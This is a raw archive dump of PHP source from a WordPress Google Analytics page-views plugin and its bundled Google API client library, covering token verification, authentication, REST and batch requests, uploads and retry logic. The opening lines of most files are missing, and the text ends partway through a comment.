Ordercustomizer/panel.php000064400000001150147600400120010547 0ustar00set_section(); } public function set_section() { $this->add_lazy_section( 'pencidesign_general_gviews_section', esc_html__( 'Google Analytics Page Views', 'penci-ga-views' ), '', __('Sync pageview data from Google Analytics to your WordPress Database, enabling you to sort posts, view pageview data in the WordPress Dashboard, and output pageviews to your visitors.','penci-ga-views') ); } }customizer/settings.php000064400000003103147600400120011310 0ustar00customizer = \SoledadFW\Customizer\Customizer::get_instance(); } if ( is_customize_preview() || ! is_admin() ) { add_filter( 'soledad_fw_register_lazy_section', array( $this, 'register_lazy_section' ) ); add_action( 'soledad_fw_register_customizer_option', array( $this, 'load_customizer' ), 95 ); } } /** * @return Customizer */ public static function getInstance() { if ( null === static::$instance ) { static::$instance = new static(); } return static::$instance; } public function register_lazy_section( $result ) { $array = $this->list_section; $path = dirname( __DIR__ ) . '/customizer/'; foreach ( $array as $id ) { $result[ $id ][] = "{$path}{$id}.php"; } return $result; } public function load_customizer() { $this->customizer = Customizer\Customizer::get_instance(); new Customizer\PenciGaViews_Option( $this->customizer, 206 ); } } customizer/pencidesign_general_gviews_section.php000064400000002257147600400120016556 0ustar00 'penci_gviews_json', 'sanitize' => 'esc_url_raw', 'type' => 'soledad-fw-upload', 'description' => __('You can get the JSON API Token by go to Google Cloud Platform. Check more in this article.'), 'label' => __( 'Upload Google JSON File', 'penci-ga-views' ), ); $options[] = array( 'id' => 'penci_gviews_profile_id', 'type' => 'soledad-fw-text', 'label' => __( 'Profile ID', 'penci-ga-views' ), 'description' => __( 'Login to Google Analytics then click Admin. It\'s a string similar to "UA-XXXXXXXXX-X". This is your Google Analytics profile ID.', 'penci-ga-views' ), ); $options[] = array( 'id' => 'penci_ga_views_cron_freq', 'type' => 'soledad-fw-select', 'label' => __( 'Auto Update Time', 'penci-ga-views' ), 'default' => 'o', 'choices' => array( 'o' => __('Disable','penci-ga-views' ), 'd' => __('Daily','penci-ga-views' ), 'w' => __('Weekly','penci-ga-views' ), ), ); return $options;google-api/src/AccessToken/Verify.php000064400000017701147600400120013535 0ustar00http = $http; $this->cache = $cache; $this->jwt = $jwt ?: $this->getJwtService(); } /** * Verifies an id token and returns the authenticated apiLoginTicket. * Throws an exception if the id token is not valid. * The audience parameter can be used to control which id tokens are * accepted. By default, the id token must have been issued to this OAuth2 client. * * @param string $idToken the ID token in JWT format * @param string $audience Optional. The audience to verify against JWt "aud" * @return array|false the token payload, if successful */ public function verifyIdToken($idToken, $audience = null) { if (empty($idToken)) { throw new LogicException('id_token cannot be null'); } // set phpseclib constants if applicable $this->setPhpsecConstants(); // Check signature $certs = $this->getFederatedSignOnCerts(); foreach ($certs as $cert) { try { $args = [$idToken]; $publicKey = $this->getPublicKey($cert); if (class_exists(Key::class)) { $args[] = new Key($publicKey, 'RS256'); } else { $args[] = $publicKey; $args[] = ['RS256']; } $payload = \call_user_func_array([$this->jwt, 'decode'], $args); if (property_exists($payload, 'aud')) { if ($audience && $payload->aud != $audience) { return false; } } // support HTTP and HTTPS issuers // @see https://developers.google.com/identity/sign-in/web/backend-auth $issuers = [self::OAUTH2_ISSUER, self::OAUTH2_ISSUER_HTTPS]; if (!isset($payload->iss) || !in_array($payload->iss, $issuers)) { return false; } return (array) $payload; } catch (ExpiredException $e) { // @phpstan-ignore-line return false; } catch (ExpiredExceptionV3 $e) { return false; } catch (SignatureInvalidException $e) { // continue } catch (DomainException $e) { // continue } } return false; } private function getCache() { return $this->cache; } /** * Retrieve and cache a certificates file. * * @param string $url location * @throws \Google\Exception * @return array certificates */ private function retrieveCertsFromLocation($url) { // If we're retrieving a local file, just grab it. if (0 !== strpos($url, 'http')) { if (!$file = file_get_contents($url)) { throw new GoogleException( "Failed to retrieve verification certificates: '" . $url . "'." ); } return json_decode($file, true); } // @phpstan-ignore-next-line $response = $this->http->get($url); if ($response->getStatusCode() == 200) { return json_decode((string) $response->getBody(), true); } throw new GoogleException( sprintf( 'Failed to retrieve verification certificates: "%s".', $response->getBody()->getContents() ), $response->getStatusCode() ); } // Gets federated sign-on certificates to use for verifying identity tokens. // Returns certs as array structure, where keys are key ids, and values // are PEM encoded certificates. private function getFederatedSignOnCerts() { $certs = null; if ($cache = $this->getCache()) { $cacheItem = $cache->getItem('federated_signon_certs_v3'); $certs = $cacheItem->get(); } if (!$certs) { $certs = $this->retrieveCertsFromLocation( self::FEDERATED_SIGNON_CERT_URL ); if ($cache) { $cacheItem->expiresAt(new DateTime('+1 hour')); $cacheItem->set($certs); $cache->save($cacheItem); } } if (!isset($certs['keys'])) { throw new InvalidArgumentException( 'federated sign-on certs expects "keys" to be set' ); } return $certs['keys']; } private function getJwtService() { $jwt = new JWT(); if ($jwt::$leeway < 1) { // Ensures JWT leeway is at least 1 // @see https://github.com/google/google-api-php-client/issues/827 $jwt::$leeway = 1; } return $jwt; } private function getPublicKey($cert) { $modulus = new BigInteger($this->jwt->urlsafeB64Decode($cert['n']), 256); $exponent = new BigInteger($this->jwt->urlsafeB64Decode($cert['e']), 256); $component = ['n' => $modulus, 'e' => $exponent]; $loader = PublicKeyLoader::load($component); return $loader->toString('PKCS8'); } /** * phpseclib calls "phpinfo" by default, which requires special * whitelisting in the AppEngine VM environment. This function * sets constants to bypass the need for phpseclib to check phpinfo * * @see phpseclib/Math/BigInteger * @see https://github.com/GoogleCloudPlatform/getting-started-php/issues/85 */ private function setPhpsecConstants() { if (filter_var(getenv('GAE_VM'), FILTER_VALIDATE_BOOLEAN)) { if (!defined('MATH_BIGINTEGER_OPENSSL_ENABLED')) { define('MATH_BIGINTEGER_OPENSSL_ENABLED', true); } if (!defined('CRYPT_RSA_MODE')) { define('CRYPT_RSA_MODE', AES::ENGINE_OPENSSL); } } } } google-api/src/AccessToken/Revoke.php000064400000004450147600400120013521 0ustar00http = $http; } /** * Revoke an OAuth2 access token or refresh token. This method will revoke the current access * token, if a token isn't provided. * * @param string|array $token The token (access token or a refresh token) that should be revoked. * @return boolean Returns True if the revocation was successful, otherwise False. */ public function revokeToken($token) { if (is_array($token)) { if (isset($token['refresh_token'])) { $token = $token['refresh_token']; } else { $token = $token['access_token']; } } $body = Psr7\Utils::streamFor(http_build_query(['token' => $token])); $request = new Request( 'POST', Client::OAUTH2_REVOKE_URI, [ 'Cache-Control' => 'no-store', 'Content-Type' => 'application/x-www-form-urlencoded', ], $body ); $httpHandler = HttpHandlerFactory::build($this->http); $response = $httpHandler($request); return $response->getStatusCode() == 200; } } google-api/src/AuthHandler/Guzzle7AuthHandler.php000064400000001324147600400120015747 0ustar00cache = $cache; $this->cacheConfig = $cacheConfig; } public function attachCredentials( ClientInterface $http, CredentialsLoader $credentials, callable $tokenCallback = null ) { // use the provided cache if ($this->cache) { $credentials = new FetchAuthTokenCache( $credentials, $this->cacheConfig, $this->cache ); } return $this->attachCredentialsCache($http, $credentials, $tokenCallback); } public function attachCredentialsCache( ClientInterface $http, FetchAuthTokenCache $credentials, callable $tokenCallback = null ) { // if we end up needing to make an HTTP request to retrieve credentials, we // can use our existing one, but we need to throw exceptions so the error // bubbles up. $authHttp = $this->createAuthHttp($http); $authHttpHandler = HttpHandlerFactory::build($authHttp); $middleware = new AuthTokenMiddleware( $credentials, $authHttpHandler, $tokenCallback ); $config = $http->getConfig(); $config['handler']->remove('google_auth'); $config['handler']->push($middleware, 'google_auth'); $config['auth'] = 'google_auth'; $http = new Client($config); return $http; } public function attachToken(ClientInterface $http, array $token, array $scopes) { $tokenFunc = function ($scopes) use ($token) { return $token['access_token']; }; $middleware = new ScopedAccessTokenMiddleware( $tokenFunc, $scopes, $this->cacheConfig, $this->cache ); $config = $http->getConfig(); $config['handler']->remove('google_auth'); $config['handler']->push($middleware, 'google_auth'); $config['auth'] = 'scoped'; $http = new Client($config); return $http; } public function attachKey(ClientInterface $http, $key) { $middleware = new SimpleMiddleware(['key' => $key]); $config = $http->getConfig(); $config['handler']->remove('google_auth'); $config['handler']->push($middleware, 'google_auth'); $config['auth'] = 'simple'; $http = new Client($config); return $http; } private function createAuthHttp(ClientInterface $http) { return new Client(['http_errors' => true] + $http->getConfig()); } } google-api/src/Http/REST.php000064400000014434147600400120011563 0ustar00|false|null $expectedClass * @param array $config * @param array $retryMap * @return mixed|T|null * @throws \Google\Service\Exception on server side error (ie: not authenticated, * invalid or malformed post body, invalid url) */ public static function execute( ClientInterface $client, RequestInterface $request, $expectedClass = null, $config = [], $retryMap = null ) { $runner = new Runner( $config, sprintf('%s %s', $request->getMethod(), (string) $request->getUri()), [self::class, 'doExecute'], [$client, $request, $expectedClass] ); if (null !== $retryMap) { $runner->setRetryMap($retryMap); } return $runner->run(); } /** * Executes a Psr\Http\Message\RequestInterface * * @template T * @param ClientInterface $client * @param RequestInterface $request * @param class-string|false|null $expectedClass * @return mixed|T|null * @throws \Google\Service\Exception on server side error (ie: not authenticated, * invalid or malformed post body, invalid url) */ public static function doExecute(ClientInterface $client, RequestInterface $request, $expectedClass = null) { try { $httpHandler = HttpHandlerFactory::build($client); $response = $httpHandler($request); } catch (RequestException $e) { // if Guzzle throws an exception, catch it and handle the response if (!$e->hasResponse()) { throw $e; } $response = $e->getResponse(); // specific checking for Guzzle 5: convert to PSR7 response if ( interface_exists('\GuzzleHttp\Message\ResponseInterface') && $response instanceof \GuzzleHttp\Message\ResponseInterface ) { $response = new Response( $response->getStatusCode(), $response->getHeaders() ?: [], $response->getBody(), $response->getProtocolVersion(), $response->getReasonPhrase() ); } } return self::decodeHttpResponse($response, $request, $expectedClass); } /** * Decode an HTTP Response. * @static * * @template T * @param RequestInterface $response The http response to be decoded. * @param ResponseInterface $response * @param class-string|false|null $expectedClass * @return mixed|T|null * @throws \Google\Service\Exception */ public static function decodeHttpResponse( ResponseInterface $response, RequestInterface $request = null, $expectedClass = null ) { $code = $response->getStatusCode(); // retry strategy if (intVal($code) >= 400) { // if we errored out, it should be safe to grab the response body $body = (string) $response->getBody(); // Check if we received errors, and add those to the Exception for convenience throw new GoogleServiceException($body, $code, null, self::getResponseErrors($body)); } // Ensure we only pull the entire body into memory if the request is not // of media type $body = self::decodeBody($response, $request); if ($expectedClass = self::determineExpectedClass($expectedClass, $request)) { $json = json_decode($body, true); return new $expectedClass($json); } return $response; } private static function decodeBody(ResponseInterface $response, RequestInterface $request = null) { if (self::isAltMedia($request)) { // don't decode the body, it's probably a really long string return ''; } return (string) $response->getBody(); } private static function determineExpectedClass($expectedClass, RequestInterface $request = null) { // "false" is used to explicitly prevent an expected class from being returned if (false === $expectedClass) { return null; } // if we don't have a request, we just use what's passed in if (null === $request) { return $expectedClass; } // return what we have in the request header if one was not supplied return $expectedClass ?: $request->getHeaderLine('X-Php-Expected-Class'); } private static function getResponseErrors($body) { $json = json_decode($body, true); if (isset($json['error']['errors'])) { return $json['error']['errors']; } return null; } private static function isAltMedia(RequestInterface $request = null) { if ($request && $qs = $request->getUri()->getQuery()) { parse_str($qs, $query); if (isset($query['alt']) && $query['alt'] == 'media') { return true; } } return false; } } google-api/src/Http/MediaFileUpload.php000064400000023572147600400120013775 0ustar00client = $client; $this->request = $request; $this->mimeType = $mimeType; $this->data = $data; $this->resumable = $resumable; $this->chunkSize = $chunkSize; $this->progress = 0; $this->process(); } /** * Set the size of the file that is being uploaded. * @param int $size - int file size in bytes */ public function setFileSize($size) { $this->size = $size; } /** * Return the progress on the upload * @return int progress in bytes uploaded. */ public function getProgress() { return $this->progress; } /** * Send the next part of the file to upload. * @param string|bool $chunk Optional. The next set of bytes to send. If false will * use $data passed at construct time. */ public function nextChunk($chunk = false) { $resumeUri = $this->getResumeUri(); if (false == $chunk) { $chunk = substr($this->data, $this->progress, $this->chunkSize); } $lastBytePos = $this->progress + strlen($chunk) - 1; $headers = [ 'content-range' => "bytes $this->progress-$lastBytePos/$this->size", 'content-length' => (string) strlen($chunk), 'expect' => '', ]; $request = new Request( 'PUT', $resumeUri, $headers, Psr7\Utils::streamFor($chunk) ); return $this->makePutRequest($request); } /** * Return the HTTP result code from the last call made. * @return int code */ public function getHttpResultCode() { return $this->httpResultCode; } /** * Sends a PUT-Request to google drive and parses the response, * setting the appropiate variables from the response() * * @param RequestInterface $request the Request which will be send * * @return false|mixed false when the upload is unfinished or the decoded http response * */ private function makePutRequest(RequestInterface $request) { $response = $this->client->execute($request); $this->httpResultCode = $response->getStatusCode(); if (308 == $this->httpResultCode) { // Track the amount uploaded. $range = $response->getHeaderLine('range'); if ($range) { $range_array = explode('-', $range); $this->progress = ((int) $range_array[1]) + 1; } // Allow for changing upload URLs. $location = $response->getHeaderLine('location'); if ($location) { $this->resumeUri = $location; } // No problems, but upload not complete. return false; } return REST::decodeHttpResponse($response, $this->request); } /** * Resume a previously unfinished upload * @param string $resumeUri the resume-URI of the unfinished, resumable upload. */ public function resume($resumeUri) { $this->resumeUri = $resumeUri; $headers = [ 'content-range' => "bytes */$this->size", 'content-length' => '0', ]; $httpRequest = new Request( 'PUT', $this->resumeUri, $headers ); return $this->makePutRequest($httpRequest); } /** * @return RequestInterface * @visible for testing */ private function process() { $this->transformToUploadUrl(); $request = $this->request; $postBody = ''; $contentType = false; $meta = json_decode((string) $request->getBody(), true); $uploadType = $this->getUploadType($meta); $request = $request->withUri( Uri::withQueryValue($request->getUri(), 'uploadType', $uploadType) ); $mimeType = $this->mimeType ?: $request->getHeaderLine('content-type'); if (self::UPLOAD_RESUMABLE_TYPE == $uploadType) { $contentType = $mimeType; $postBody = is_string($meta) ? $meta : json_encode($meta); } elseif (self::UPLOAD_MEDIA_TYPE == $uploadType) { $contentType = $mimeType; $postBody = $this->data; } elseif (self::UPLOAD_MULTIPART_TYPE == $uploadType) { // This is a multipart/related upload. $boundary = $this->boundary ?: mt_rand(); $boundary = str_replace('"', '', $boundary); $contentType = 'multipart/related; boundary=' . $boundary; $related = "--$boundary\r\n"; $related .= "Content-Type: application/json; charset=UTF-8\r\n"; $related .= "\r\n" . json_encode($meta) . "\r\n"; $related .= "--$boundary\r\n"; $related .= "Content-Type: $mimeType\r\n"; $related .= "Content-Transfer-Encoding: base64\r\n"; $related .= "\r\n" . base64_encode($this->data) . "\r\n"; $related .= "--$boundary--"; $postBody = $related; } $request = $request->withBody(Psr7\Utils::streamFor($postBody)); if ($contentType) { $request = $request->withHeader('content-type', $contentType); } return $this->request = $request; } /** * Valid upload types: * - resumable (UPLOAD_RESUMABLE_TYPE) * - media (UPLOAD_MEDIA_TYPE) * - multipart (UPLOAD_MULTIPART_TYPE) * @param string|false $meta * @return string * @visible for testing */ public function getUploadType($meta) { if ($this->resumable) { return self::UPLOAD_RESUMABLE_TYPE; } if (false == $meta && $this->data) { return self::UPLOAD_MEDIA_TYPE; } return self::UPLOAD_MULTIPART_TYPE; } public function getResumeUri() { if (null === $this->resumeUri) { $this->resumeUri = $this->fetchResumeUri(); } return $this->resumeUri; } private function fetchResumeUri() { $body = $this->request->getBody(); $headers = [ 'content-type' => 'application/json; charset=UTF-8', 'content-length' => $body->getSize(), 'x-upload-content-type' => $this->mimeType, 'x-upload-content-length' => $this->size, 'expect' => '', ]; foreach ($headers as $key => $value) { $this->request = $this->request->withHeader($key, $value); } $response = $this->client->execute($this->request, false); $location = $response->getHeaderLine('location'); $code = $response->getStatusCode(); if (200 == $code && true == $location) { return $location; } $message = $code; $body = json_decode((string) $this->request->getBody(), true); if (isset($body['error']['errors'])) { $message .= ': '; foreach ($body['error']['errors'] as $error) { $message .= "{$error['domain']}, {$error['message']};"; } $message = rtrim($message, ';'); } $error = "Failed to start the resumable upload (HTTP {$message})"; $this->client->getLogger()->error($error); throw new GoogleException($error); } private function transformToUploadUrl() { $parts = parse_url((string) $this->request->getUri()); if (!isset($parts['path'])) { $parts['path'] = ''; } $parts['path'] = '/upload' . $parts['path']; $uri = Uri::fromParts($parts); $this->request = $this->request->withUri($uri); } public function setChunkSize($chunkSize) { $this->chunkSize = $chunkSize; } public function getRequest() { return $this->request; } } google-api/src/Http/Batch.php000064400000017527147600400120012035 0ustar00client = $client; $this->boundary = $boundary ?: mt_rand(); $this->rootUrl = rtrim($rootUrl ?: $this->client->getConfig('base_path'), '/'); $this->batchPath = $batchPath ?: self::BATCH_PATH; } public function add(RequestInterface $request, $key = false) { if (false == $key) { $key = mt_rand(); } $this->requests[$key] = $request; } public function execute() { $body = ''; $classes = []; $batchHttpTemplate = <<requests as $key => $request) { $firstLine = sprintf( '%s %s HTTP/%s', $request->getMethod(), $request->getRequestTarget(), $request->getProtocolVersion() ); $content = (string) $request->getBody(); $headers = ''; foreach ($request->getHeaders() as $name => $values) { $headers .= sprintf("%s:%s\r\n", $name, implode(', ', $values)); } $body .= sprintf( $batchHttpTemplate, $this->boundary, $key, $firstLine, $headers, $content ? "\n" . $content : '' ); $classes['response-' . $key] = $request->getHeaderLine('X-Php-Expected-Class'); } $body .= "--{$this->boundary}--"; $body = trim($body); $url = $this->rootUrl . '/' . $this->batchPath; $headers = [ 'Content-Type' => sprintf('multipart/mixed; boundary=%s', $this->boundary), 'Content-Length' => (string) strlen($body), ]; $request = new Request( 'POST', $url, $headers, $body ); $response = $this->client->execute($request); return $this->parseResponse($response, $classes); } public function parseResponse(ResponseInterface $response, $classes = []) { $contentType = $response->getHeaderLine('content-type'); $contentType = explode(';', $contentType); $boundary = false; foreach ($contentType as $part) { $part = explode('=', $part, 2); if (isset($part[0]) && 'boundary' == trim($part[0])) { $boundary = $part[1]; } } $body = (string) $response->getBody(); if (!empty($body)) { $body = str_replace("--$boundary--", "--$boundary", $body); $parts = explode("--$boundary", $body); $responses = []; $requests = array_values($this->requests); foreach ($parts as $i => $part) { $part = trim($part); if (!empty($part)) { list($rawHeaders, $part) = explode("\r\n\r\n", $part, 2); $headers = $this->parseRawHeaders($rawHeaders); $status = substr($part, 0, strpos($part, "\n")); $status = explode(" ", $status); $status = $status[1]; list($partHeaders, $partBody) = $this->parseHttpResponse($part, 0); $response = new Response( (int) $status, $partHeaders, Psr7\Utils::streamFor($partBody) ); // Need content id. $key = $headers['content-id']; try { $response = REST::decodeHttpResponse($response, $requests[$i-1]); } catch (GoogleServiceException $e) { // Store the exception as the response, so successful responses // can be processed. $response = $e; } $responses[$key] = $response; } } return $responses; } return null; } private function parseRawHeaders($rawHeaders) { $headers = []; $responseHeaderLines = explode("\r\n", $rawHeaders); foreach ($responseHeaderLines as $headerLine) { if ($headerLine && strpos($headerLine, ':') !== false) { list($header, $value) = explode(': ', $headerLine, 2); $header = strtolower($header); if (isset($headers[$header])) { $headers[$header] = array_merge((array)$headers[$header], (array)$value); } else { $headers[$header] = $value; } } } return $headers; } /** * Used by the IO lib and also the batch processing. * * @param string $respData * @param int $headerSize * @return array */ private function parseHttpResponse($respData, $headerSize) { // check proxy header foreach (self::$CONNECTION_ESTABLISHED_HEADERS as $established_header) { if (stripos($respData, $established_header) !== false) { // existed, remove it $respData = str_ireplace($established_header, '', $respData); // Subtract the proxy header size unless the cURL bug prior to 7.30.0 // is present which prevented the proxy header size from being taken into // account. // @TODO look into this // if (!$this->needsQuirk()) { // $headerSize -= strlen($established_header); // } break; } } if ($headerSize) { $responseBody = substr($respData, $headerSize); $responseHeaders = substr($respData, 0, $headerSize); } else { $responseSegments = explode("\r\n\r\n", $respData, 2); $responseHeaders = $responseSegments[0]; $responseBody = isset($responseSegments[1]) ? $responseSegments[1] : null; } $responseHeaders = $this->parseRawHeaders($responseHeaders); return [$responseHeaders, $responseBody]; } } google-api/src/Service/Resource.php000064400000025742147600400120013262 0ustar00 ['type' => 'string', 'location' => 'query'], 'fields' => ['type' => 'string', 'location' => 'query'], 'trace' => ['type' => 'string', 'location' => 'query'], 'userIp' => ['type' => 'string', 'location' => 'query'], 'quotaUser' => ['type' => 'string', 'location' => 'query'], 'data' => ['type' => 'string', 'location' => 'body'], 'mimeType' => ['type' => 'string', 'location' => 'header'], 'uploadType' => ['type' => 'string', 'location' => 'query'], 'mediaUpload' => ['type' => 'complex', 'location' => 'query'], 'prettyPrint' => ['type' => 'string', 'location' => 'query'], ]; /** @var string $rootUrl */ private $rootUrl; /** @var \Google\Client $client */ private $client; /** @var string $serviceName */ private $serviceName; /** @var string $servicePath */ private $servicePath; /** @var string $resourceName */ private $resourceName; /** @var array $methods */ private $methods; public function __construct($service, $serviceName, $resourceName, $resource) { $this->rootUrl = $service->rootUrl; $this->client = $service->getClient(); $this->servicePath = $service->servicePath; $this->serviceName = $serviceName; $this->resourceName = $resourceName; $this->methods = is_array($resource) && isset($resource['methods']) ? $resource['methods'] : [$resourceName => $resource]; } /** * TODO: This function needs simplifying. * * @template T * @param string $name * @param array $arguments * @param class-string $expectedClass - optional, the expected class name * @return mixed|T|ResponseInterface|RequestInterface * @throws \Google\Exception */ public function call($name, $arguments, $expectedClass = null) { if (! isset($this->methods[$name])) { $this->client->getLogger()->error( 'Service method unknown', [ 'service' => $this->serviceName, 'resource' => $this->resourceName, 'method' => $name ] ); throw new GoogleException( "Unknown function: " . "{$this->serviceName}->{$this->resourceName}->{$name}()" ); } $method = $this->methods[$name]; $parameters = $arguments[0]; // postBody is a special case since it's not defined in the discovery // document as parameter, but we abuse the param entry for storing it. $postBody = null; if (isset($parameters['postBody'])) { if ($parameters['postBody'] instanceof Model) { // In the cases the post body is an existing object, we want // to use the smart method to create a simple object for // for JSONification. $parameters['postBody'] = $parameters['postBody']->toSimpleObject(); } elseif (is_object($parameters['postBody'])) { // If the post body is another kind of object, we will try and // wrangle it into a sensible format. $parameters['postBody'] = $this->convertToArrayAndStripNulls($parameters['postBody']); } $postBody = (array) $parameters['postBody']; unset($parameters['postBody']); } // TODO: optParams here probably should have been // handled already - this may well be redundant code. if (isset($parameters['optParams'])) { $optParams = $parameters['optParams']; unset($parameters['optParams']); $parameters = array_merge($parameters, $optParams); } if (!isset($method['parameters'])) { $method['parameters'] = []; } $method['parameters'] = array_merge( $this->stackParameters, $method['parameters'] ); foreach ($parameters as $key => $val) { if ($key != 'postBody' && !isset($method['parameters'][$key])) { $this->client->getLogger()->error( 'Service parameter unknown', [ 'service' => $this->serviceName, 'resource' => $this->resourceName, 'method' => $name, 'parameter' => $key ] ); throw new GoogleException("($name) unknown parameter: '$key'"); } } foreach ($method['parameters'] as $paramName => $paramSpec) { if ( isset($paramSpec['required']) && $paramSpec['required'] && ! isset($parameters[$paramName]) ) { $this->client->getLogger()->error( 'Service parameter missing', [ 'service' => $this->serviceName, 'resource' => $this->resourceName, 'method' => $name, 'parameter' => $paramName ] ); throw new GoogleException("($name) missing required param: '$paramName'"); } if (isset($parameters[$paramName])) { $value = $parameters[$paramName]; $parameters[$paramName] = $paramSpec; $parameters[$paramName]['value'] = $value; unset($parameters[$paramName]['required']); } else { // Ensure we don't pass nulls. unset($parameters[$paramName]); } } $this->client->getLogger()->info( 'Service Call', [ 'service' => $this->serviceName, 'resource' => $this->resourceName, 'method' => $name, 'arguments' => $parameters, ] ); // build the service uri $url = $this->createRequestUri($method['path'], $parameters); // NOTE: because we're creating the request by hand, // and because the service has a rootUrl property // the "base_uri" of the Http Client is not accounted for $request = new Request( $method['httpMethod'], $url, $postBody ? ['content-type' => 'application/json'] : [], $postBody ? json_encode($postBody) : '' ); // support uploads if (isset($parameters['data'])) { $mimeType = isset($parameters['mimeType']) ? $parameters['mimeType']['value'] : 'application/octet-stream'; $data = $parameters['data']['value']; $upload = new MediaFileUpload($this->client, $request, $mimeType, $data); // pull down the modified request $request = $upload->getRequest(); } // if this is a media type, we will return the raw response // rather than using an expected class if (isset($parameters['alt']) && $parameters['alt']['value'] == 'media') { $expectedClass = null; } // if the client is marked for deferring, rather than // execute the request, return the response if ($this->client->shouldDefer()) { // @TODO find a better way to do this $request = $request ->withHeader('X-Php-Expected-Class', $expectedClass); return $request; } return $this->client->execute($request, $expectedClass); } protected function convertToArrayAndStripNulls($o) { $o = (array) $o; foreach ($o as $k => $v) { if ($v === null) { unset($o[$k]); } elseif (is_object($v) || is_array($v)) { $o[$k] = $this->convertToArrayAndStripNulls($o[$k]); } } return $o; } /** * Parse/expand request parameters and create a fully qualified * request uri. * @static * @param string $restPath * @param array $params * @return string $requestUrl */ public function createRequestUri($restPath, $params) { // Override the default servicePath address if the $restPath use a / if ('/' == substr($restPath, 0, 1)) { $requestUrl = substr($restPath, 1); } else { $requestUrl = $this->servicePath . $restPath; } // code for leading slash if ($this->rootUrl) { if ('/' !== substr($this->rootUrl, -1) && '/' !== substr($requestUrl, 0, 1)) { $requestUrl = '/' . $requestUrl; } $requestUrl = $this->rootUrl . $requestUrl; } $uriTemplateVars = []; $queryVars = []; foreach ($params as $paramName => $paramSpec) { if ($paramSpec['type'] == 'boolean') { $paramSpec['value'] = $paramSpec['value'] ? 'true' : 'false'; } if ($paramSpec['location'] == 'path') { $uriTemplateVars[$paramName] = $paramSpec['value']; } elseif ($paramSpec['location'] == 'query') { if (is_array($paramSpec['value'])) { foreach ($paramSpec['value'] as $value) { $queryVars[] = $paramName . '=' . rawurlencode(rawurldecode($value)); } } else { $queryVars[] = $paramName . '=' . rawurlencode(rawurldecode($paramSpec['value'])); } } } if (count($uriTemplateVars)) { $uriTemplateParser = new UriTemplate(); $requestUrl = $uriTemplateParser->parse($requestUrl, $uriTemplateVars); } if (count($queryVars)) { $requestUrl .= '?' . implode('&', $queryVars); } return $requestUrl; } } google-api/src/Service/README.md000064400000000301147600400120012221 0ustar00# Google API Client Services Google API Client Service classes have been moved to the [google-api-php-client-services](https://github.com/google/google-api-php-client-services) repository. google-api/src/Service/Exception.php000064400000003767147600400120013434 0ustar00>|null $errors List of errors returned in an HTTP * response or null. Defaults to []. */ public function __construct( $message, $code = 0, Exception $previous = null, $errors = [] ) { if (version_compare(PHP_VERSION, '5.3.0') >= 0) { parent::__construct($message, $code, $previous); } else { parent::__construct($message, $code); } $this->errors = $errors; } /** * An example of the possible errors returned. * * [ * { * "domain": "global", * "reason": "authError", * "message": "Invalid Credentials", * "locationType": "header", * "location": "Authorization", * } * ] * * @return array>|null List of errors returned in an HTTP response or null. */ public function getErrors() { return $this->errors; } } google-api/src/Task/Exception.php000064400000001310147600400120012714 0ustar00getComposer(); $extra = $composer->getPackage()->getExtra(); $servicesToKeep = isset($extra['google/apiclient-services']) ? $extra['google/apiclient-services'] : []; if ($servicesToKeep) { $vendorDir = $composer->getConfig()->get('vendor-dir'); $serviceDir = sprintf( '%s/google/apiclient-services/src/Google/Service', $vendorDir ); if (!is_dir($serviceDir)) { // path for google/apiclient-services >= 0.200.0 $serviceDir = sprintf( '%s/google/apiclient-services/src', $vendorDir ); } self::verifyServicesToKeep($serviceDir, $servicesToKeep); $finder = self::getServicesToRemove($serviceDir, $servicesToKeep); $filesystem = $filesystem ?: new Filesystem(); if (0 !== $count = count($finder)) { $event->getIO()->write( sprintf('Removing %s google services', $count) ); foreach ($finder as $file) { $realpath = $file->getRealPath(); $filesystem->remove($realpath); $filesystem->remove($realpath . '.php'); } } } } /** * @throws InvalidArgumentException when the service doesn't exist */ private static function verifyServicesToKeep( $serviceDir, array $servicesToKeep ) { $finder = (new Finder()) ->directories() ->depth('== 0'); foreach ($servicesToKeep as $service) { if (!preg_match('/^[a-zA-Z0-9]*$/', $service)) { throw new InvalidArgumentException( sprintf( 'Invalid Google service name "%s"', $service ) ); } try { $finder->in($serviceDir . '/' . $service); } catch (InvalidArgumentException $e) { throw new InvalidArgumentException( sprintf( 'Google service "%s" does not exist or was removed previously', $service ) ); } } } private static function getServicesToRemove( $serviceDir, array $servicesToKeep ) { // find all files in the current directory return (new Finder()) ->directories() ->depth('== 0') ->in($serviceDir) ->exclude($servicesToKeep); } } google-api/src/Task/Retryable.php000064400000001357147600400120012722 0ustar00 self::TASK_RETRY_ALWAYS, '503' => self::TASK_RETRY_ALWAYS, 'rateLimitExceeded' => self::TASK_RETRY_ALWAYS, 'userRateLimitExceeded' => self::TASK_RETRY_ALWAYS, 6 => self::TASK_RETRY_ALWAYS, // CURLE_COULDNT_RESOLVE_HOST 7 => self::TASK_RETRY_ALWAYS, // CURLE_COULDNT_CONNECT 28 => self::TASK_RETRY_ALWAYS, // CURLE_OPERATION_TIMEOUTED 35 => self::TASK_RETRY_ALWAYS, // CURLE_SSL_CONNECT_ERROR 52 => self::TASK_RETRY_ALWAYS, // CURLE_GOT_NOTHING 'lighthouseError' => self::TASK_RETRY_NEVER ]; /** * Creates a new task runner with exponential backoff support. * * @param array $config The task runner config * @param string $name The name of the current task (used for logging) * @param callable $action The task to run and possibly retry * @param array $arguments The task arguments * @throws \Google\Task\Exception when misconfigured */ // @phpstan-ignore-next-line public function __construct( $config, $name, $action, array $arguments = [] ) { if (isset($config['initial_delay'])) { if ($config['initial_delay'] < 0) { throw new GoogleTaskException( 'Task configuration `initial_delay` must not be negative.' ); } $this->delay = $config['initial_delay']; } if (isset($config['max_delay'])) { if ($config['max_delay'] <= 0) { throw new GoogleTaskException( 'Task configuration `max_delay` must be greater than 0.' ); } $this->maxDelay = $config['max_delay']; } if (isset($config['factor'])) { if ($config['factor'] <= 0) { throw new GoogleTaskException( 'Task configuration `factor` must be greater than 0.' ); } $this->factor = $config['factor']; } if (isset($config['jitter'])) { if ($config['jitter'] <= 0) { throw new GoogleTaskException( 'Task configuration `jitter` must be greater than 0.' ); } $this->jitter = $config['jitter']; } if (isset($config['retries'])) { if ($config['retries'] < 0) { throw new GoogleTaskException( 'Task configuration `retries` must not be negative.' ); } $this->maxAttempts += $config['retries']; } if (!is_callable($action)) { throw new GoogleTaskException( 'Task argument `$action` must be a valid callable.' ); } $this->action = $action; $this->arguments = $arguments; } /** * Checks if a retry can be attempted. * * @return boolean */ public function canAttempt() { return $this->attempts < $this->maxAttempts; } /** * Runs the task and (if applicable) automatically retries when errors occur. * * @return mixed * @throws \Google\Service\Exception on failure when no retries are 